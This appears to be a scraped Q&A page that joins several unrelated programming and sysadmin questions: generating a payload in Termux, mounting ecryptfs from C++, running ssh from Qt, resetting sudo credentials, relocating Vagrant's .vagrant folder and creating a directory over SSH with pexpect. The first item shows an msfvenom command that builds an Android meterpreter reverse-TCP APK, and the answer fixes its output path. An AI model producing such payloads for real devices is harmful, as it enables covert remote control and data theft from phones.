A problem to Creating metasploit payload in termux - termux

msfvenom -p android/meterpreter/reverse_tcp LHOST= ip
LPORT=4444 R > /storage/hackmingtest.apk
bash: /storage/hackmingtest.apk: Permission denied
I use this command also (termux-setup-storage)
But it is not working

The Solution' to this Question is very simple ..
The /storage directory requires root access. I think the Location you wanna enter is /storage/emulated/0/something.apk
ALTERNATIVELY, you can also use /sdcard/whatever.apk
🖖🏻

Related

Mounting ecryptfs using C++ mount function

I am trying to mount ecryptfs from within a C++ program. I can definitely mount it without it asking questions by issuing this command at the prompt:
sudo mount -t ecryptfs -o "rw,key=passphrase:passphrase_passwd=geoff,ecryptfs_cipher=aes,ecryptfs_key_bytes=32,ecryptfs_passthrough=n,ecryptfs_enable_filename_crypto=n,no_sig_cache" ~/source/ ~/target/
Note that in reality, I am passing a full canonical path in case that matters.
But from within the program I get failure with errno=EINVAL after trying by using the mount() function with the same arguments:
mount("~/source/", "~/target/", "ecryptfs", MS_NODEV, "rw,key=passphrase:passphrase_passwd=geoff,ecryptfs_cipher=aes,ecryptfs_key_bytes=32,ecryptfs_passthrough=n,ecryptfs_enable_filename_crypto=n,no_sig_cache")
The program does launch with root privileges and I have checked that I have CAP_SYS_ADMIN.
The mount() function returns -1 and sets errno to EINVAL.
Have I got the arguments correct? Is this maybe a privileges issue?
EDIT: I got it to work by executing mount externally via system(), but would still like to use the function because of reasons.
I believe this is because mount -t ecryptfs is actually calling the helper executable mount.ecryptfs, and it's processing some of the options (in particular, key=) itself. What's actually passed to the kernel is different (you can see this by looking at /proc/mounts afterward).
If you look closely at https://manpages.ubuntu.com/manpages/kinetic/en/man7/ecryptfs.7.html, key= and ecryptfs_enable_filename_crypto= are listed under "MOUNT HELPER OPTIONS" - the actual kernel module's options are ecryptfs_sig=(fekek_sig) and ecryptfs_fnek_sig=(fnek_sig).
So, if you want to bypass the helper and do the mount directly, you'd need to load the tokens into the kernel's keyring with https://man7.org/linux/man-pages/man2/keyctl.2.html and replace key= with the resulting token signatures, like mount.ecryptfs did.
It does appear that there is a libecrytpfs with functions in ecryptfs.h like ecryptfs_add_passphrase_key_to_keyring which you can (presumably, not tested) use to do this in a way matching the mount.ecryptfs

Ssh command from Qt

I have a problem with ssh in my Qt application. I need to run a command which removes a file on a remote server. I tried to use a QProcess class to achieve it. So I pass "ssh" as a name of command and necessary args. In common it looks like this:
QStringList params;
params.append(" user#" + ::host +
" \"rm /tmp/" + ::fileName + "\"");
d->impDelProcess->start("ssh", params);
But after all it keeps asking a password, though I generated ssh keys and copied a public key to the remote server. Moreover, when I run the command above in the terminal like this:
ssh user#host "rm /path/fileName"
it works perfect. The file is deleted and no password is asked. So, the problem is somwhere in QProcess. Is any way to get rid of asking a password? Thank you!
Those are separate arguments, when you use string list. Try this:
params.append("user#" + ::host");
params.append("rm /tmp/" + ::fileName);
That will make Qt pass two arguments for ssh, the login string and the command to execute at remote host.
Important note! Above assumes ::filename does not contain spaces or anything else nasty!. You can get around spaces with this:
params.append("rm '/tmp/" + ::fileName + "'");
But it won't help against wild cards or .. in path... Imagine if file name was ../home/user/* for example... So that is better be trusted input, or you need to sanitize it (but that is beyond scope of this answer).
What you do in the question code is to construct a single argument, equivalent to this shell command line:
ssh 'user#host "rm /path/filename"'

How to immediately forget last sudo usage

I am trying, in C++, to write a program that will request sudo privilege if it does not have it. I have accomplished that through execl("/usr/bin/sudo", "sudo", argv[0]); but my biggest problem is occurring in trying to test it. Is there a way to make the system forget that I have recently used sudo so I can run and request access again?
sudo -k invalidates the credentials.
Edit:
There is sudo -K (capital K) command that you can invoke to invalidate the credentials, but the -k flag can be used by prepending it to argv (maybe even based on the build configuration)
Do the following steps to change the default timeout.
sudo visudo
scroll down and add the following line at the end:
Defaults:user_name timestamp_timeout=0
1) Change user_name to your actual user name.
2) Change 10 (in minutes) to anything you wish. A value of -1 will make it infinite (for a single session).
3) Hit Ctrl-X and then hit Y.
You are all set!
Reference

Manually specify location of .vagrant folder in Vagrantfile

The folder where I have Vagrantfile is being auto-generated during the build, so it gets cleaned up, but I'd like to still be able to use the created machines. The easiest way would be to put .vagrant folder somewhere outside the auto-generated folder. Is this possible?
You have (at least) two options:
Use VAGRANT_DOTFILE_PATH to set the the location where the project specific data is stored (defaults to .vagrant as you already know). Note that the path has to be project/Vagrantfile specific.
cd to a directory where you want the .vagrant directory to be created, and use VAGRANT_VAGRANTFILE to specify the path to the generated Vagrantfile.
I know this is an old question, but for anyone arriving here via Google, there is a workaround if you really want to specify the metadata directory without mucking about with environment variables each time. Just put this in the top of your Vagrantfile:
VAGRANT_DOTFILE_PATH = 'custom/dotfile/path'
if(ENV['VAGRANT_DOTFILE_PATH'].nil? && '.vagrant' != VAGRANT_DOTFILE_PATH)
puts 'changing metadata directory to ' + VAGRANT_DOTFILE_PATH
ENV['VAGRANT_DOTFILE_PATH'] = VAGRANT_DOTFILE_PATH
puts 'removing default metadata directory ' + FileUtils.rm_r('.vagrant').join("\n")
system 'vagrant ' + ARGV.join(' ')
ENV['VAGRANT_DOTFILE_PATH'] = nil #for good measure
abort 'Finished'
end
I wanted each provider to use a separate Vagrant directory to easily be able to swap between them. I could not get #hairraisin's solution to work, but based on that I ended up with the following:
Vagrant.configure('2') do |config|
config.vm.provider :lxd do |lxd, override|
if ENV['VAGRANT_DOTFILE_PATH'].nil?
ENV['VAGRANT_DOTFILE_PATH'] = '.vagrant-lxd'
puts 'Removing default metadata directory ' + FileUtils.rm_r('.vagrant').join("\n")
exec 'vagrant ' + ARGV.map{|arg| Shellwords.escape arg}.join(' ')
end
…
This avoids endless recursion or aborting too early. exec rather than system avoids a non-zero exit code from every vagrant command.

Mkdir over SSH with Python does not work

I'm trying to create a new dir via SSH with a python script. When i try my commands by using the Python command line it just works. But when I try to do the same by a script it does not create the new 'test' folder (I even copy/paste the commands in the script into the Python cmd to verify they are right and there they work). So any ideas why it does not work by script?
The used code:
child = pexpect.spawn('ssh 192.168.56.101 -oStrictHostKeyChecking=no')
child.expect=('password:')
child.sendline('MyPwd')
child.sendline('mkdir /home/myUser/Desktop/test')
Seems to work when I just add another line
for example
child.sendline('\n')
so the entire script is
child = pexpect.spawn('ssh 192.168.56.101 -oStrictHostKeyChecking=no')
child.expect=('password:')
child.sendline('MyPwd')
child.sendline('mkdir /home/myUser/Desktop/test')
child.sendline('\n')
What I usually do to solve this issue is sync-ing with host machine. After I send something to the machine, I expect an answer, which usually translates in the machine's prompt. So, in your case, I would go for something like this:
child = pexpect.spawn('ssh 192.168.56.101 -oStrictHostKeyChecking=no')
child.expect('password:')
child.sendline('MyPwd')
child.expect('YourPromptHere')
child.sendline('mkdir /home/myUser/Desktop/test')
child.expect('YourPromptHere')
You can just replace YourPromptHere with the prompt of the machine, if you are running the script on a single target, or with a regular expression (eg. "(\$ )|(# )|(> )").
tl;dr : To summarize what I said, you need to wait until the previous action was finished until sending a new one.